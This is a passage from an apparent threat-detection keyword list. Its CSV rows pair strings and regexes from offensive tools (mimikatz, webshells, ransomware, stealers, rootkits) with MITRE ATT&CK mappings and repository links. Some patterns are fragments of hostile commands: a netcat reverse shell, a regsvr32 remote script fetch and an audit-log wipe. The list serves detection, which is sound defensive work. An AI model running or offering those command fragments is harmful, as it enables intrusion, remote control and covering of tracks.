Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*|/bin/sh -i 2>&1|nc * >/tmp/f*",".{0,1000}\|\/bin\/sh\s\-i\s2\>\&1\|nc\s.{0,1000}\s\>\/tmp\/f.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*|base64 -d > /tmp/traitor*",".{0,1000}\|base64\s\-d\s\>\s\/tmp\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*|IEX}DumpSAM*",".{0,1000}\|IEX\}DumpSAM.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*~/.csexec*",".{0,1000}\~\/\.csexec.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*< /dev/console | uudecode && uncompress*",".{0,1000}\<\s\/dev\/console\s\|\suudecode\s\&\&\suncompress.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitrary cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*<3 eo.oe*",".{0,1000}\<3\seo\.oe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "**",".{0,1000}\.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "*

.:NCC:. Shell v*",".{0,1000}\\.\:NCC\:\.\sShell\sv.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php text webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*

-=[+] IDBTEAM SHELLS*",".{0,1000}\\\-\=\[\+\]\sIDBTEAM\sSHELLS.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php text webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*

Wraith Login*",".{0,1000}\Wraith\sLogin.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*

Laudanum Tools*",".{0,1000}\Laudanum\sTools.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php text webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*

Why pay us?

*",".{0,1000}\Why\spay\sus\?\<\/h2\>.{0,1000}","offensive_tool_keyword","SunCrypt","SunCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*Wardom | Ne Mutlu T*",".{0,1000}\<head\>\<title\>Wardom\s\|\sNe\sMutlu\sT.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*<SessionId>: list/steal token from specific session*",".{0,1000}\<SessionId\>\:\slist\/steal\stoken\sfrom\sspecific\ssession.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#program content","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*<title>Dynasty Persist*",".{0,1000}\Dynasty\sPersist\<\/title\>.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*PrivescCheck Report*",".{0,1000}\PrivescCheck\sReport\<\/title\>.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Sosyete Safe Mode Bypass Shell -*",".{0,1000}\<title\>Sosyete\sSafe\sMode\sBypass\sShell\s\-.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*<title>SyRiAn Sh3ll ~*",".{0,1000}\<title\>SyRiAn\sSh3ll\s\~.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*<title>WebRoot Hack Tools""*",".{0,1000}\<title\>WebRoot\sHack\sTools\"".{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*<title>Wraith Login*",".{0,1000}\Wraith\sLogin\<\/title\>.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*= ""evil-proxy""*",".{0,1000}\=\s\""evil\-proxy\"".{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - 
TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*=[ 1n73ct10n privat shell ]=*",".{0,1000}\=\[\s1n73ct10n\sprivat\sshell\s\]\=.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*== NoPowerShell v* ==*",".{0,1000}\=\=\sNoPowerShell\sv.{0,1000}\s\=\=.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*== NoPowerShell v* ==*",".{0,1000}\=\=\sNoPowerShell\sv.{0,1000}\s\=\=.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*--==[[ Andela Yuwono Priv8 Shell ]]==--*",".{0,1000}\-\-\=\=\[\[\sAndela\sYuwono\sPriv8\sShell\s\]\]\=\=\-\-.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===*",".{0,1000}\=\=\=\sGENERATING\sMALICIOUS\sGROUP\sPOLICY\sTEMPLATE\s\=\=\=.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*=== LAUNCHING SMB SERVER AND WAITING FOR GPT REQUESTS ===*",".{0,1000}\=\=\=\sLAUNCHING\sSMB\sSERVER\sAND\sWAITING\sFOR\sGPT\sREQUESTS\s\=\=\=.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*=== SharpUp: Running Privilege Escalation Checks ===*",".{0,1000}\=\=\=\sSharpUp\:\sRunning\sPrivilege\sEscalation\sChecks\s\=\=\=.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*=== SPOOFING THE GPLINK ATTRIBUTE OF THE TARGET OU ===*",".{0,1000}\=\=\=\sSPOOFING\sTHE\sGPLINK\sATTRIBUTE\sOF\sTHE\sTARGET\sOU\s\=\=\=.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*=== WAITING (GPT REQUESTS WILL BE FORWARDED TO SMB SERVER) ===*",".{0,1000}\=\=\=\sWAITING\s\(GPT\sREQUESTS\sWILL\sBE\sFORWARDED\sTO\sSMB\sSERVER\)\s\=\=\=.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*=== WAITING (SMB NTLM AUTHENTICATION COERCED TO *",".{0,1000}\=\=\=\sWAITING\s\(SMB\sNTLM\sAUTHENTICATION\sCOERCED\sTO\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*===[[[ A Black Path Toward The Sun ]]]===*",".{0,1000}\=\=\=\[\[\[\sA\sBlack\sPath\sToward\sThe\sSun\s\]\]\]\=\=\=.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - 
T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*=========== Havoc and msf revshell ========*",".{0,1000}\=\=\=\=\=\=\=\=\=\=\=\sHavoc\sand\smsf\srevshell\s\=\=\=\=\=\=\=\=.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*===PARASITE INVOKE*",".{0,1000}\=\=\=PARASITE\sINVOKE.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*==gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U*",".{0,1000}\=\=gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*==gNyEDMx80UJpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=gNyEDMx80UJpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*==gQDVkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=gQDVkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*==wcvJXZapjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wcvJXZapjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*==wMykDWJNlTBpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wMykDWJNlTBpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*==wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*==wQCNkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wQCNkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*=Administrator.ccache*",".{0,1000}\=Administrator\.ccache.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*=imaohw*",".{0,1000}\=imaohw.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed whoami","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*=MSEXCEL*regsvr32 /s /n /u /i:http*/SCTLauncher.sct scrobj.dll*",".{0,1000}\=MSEXCEL.{0,1000}regsvr32\s\/s\s\/n\s\/u\s\/i\:http.{0,1000}\/SCTLauncher\.sct\sscrobj\.dll.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*=ogIXFlckIzYIRCekEHMORiIgwWY2VmCpICcahHJVRCTkcVUyRie5YFJ3RiZkAnW4RidkIzYIRiYkcHJzRCZkcVUyRyYkcHJyMGSkICIsFmdlhCJ9gnC*",".{0,1000}\=ogIXFlckIzYIRCekEHMORiIgwWY2VmCpICcahHJVRCTkcVUyRie5YFJ3RiZkAnW4RidkIzYIRiYkcHJzRCZkcVUyRyYkcHJyMGSkICIsFmdlhCJ9gnC.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*=resu ten*",".{0,1000}\=resu\sten.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*> /var/log/audit/audit.log* rm -f .*",".{0,1000}\>\s\/var\/log\/audit\/audit\.log.{0,1000}\srm\s\-f\s\..{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*>[ STARTING CRASH DUMP ACQUISITION ]<*",".{0,1000}\>\[\sSTARTING\sCRASH\sDUMP\sACQUISITION\s\]\<.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*>[ STARTING NT HASHES EXTRACTION ]<*",".{0,1000}\>\[\sSTARTING\sNT\sHASHES\sEXTRACTION\s\]\<.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*>\fuego-control*",".{0,1000}\>\\fuego\-control.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 
- T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","named pipe","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*>\fuego-data*",".{0,1000}\>\\fuego\-data.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","named pipe","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*>\fuegoshell*",".{0,1000}\>\\fuegoshell.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","named pipe","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*>--~~--> Args? <--~~--<*",".{0,1000}\>\-\-\~\~\-\-\>\sArgs\?\s\<\-\-\~\~\-\-\<.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*>> Where to hide the payload? 
Select a number: *",".{0,1000}\>\>\sWhere\sto\shide\sthe\spayload\?\sSelect\sa\snumber\:\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*>BrowsingHistoryView<*",".{0,1000}\>BrowsingHistoryView\<.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*>CursorSvc<*",".{0,1000}\>CursorSvc\<.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*>-Infected Systems Database-</span>*",".{0,1000}\>\-Infected\sSystems\sDatabase\-\<\/span\>.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 
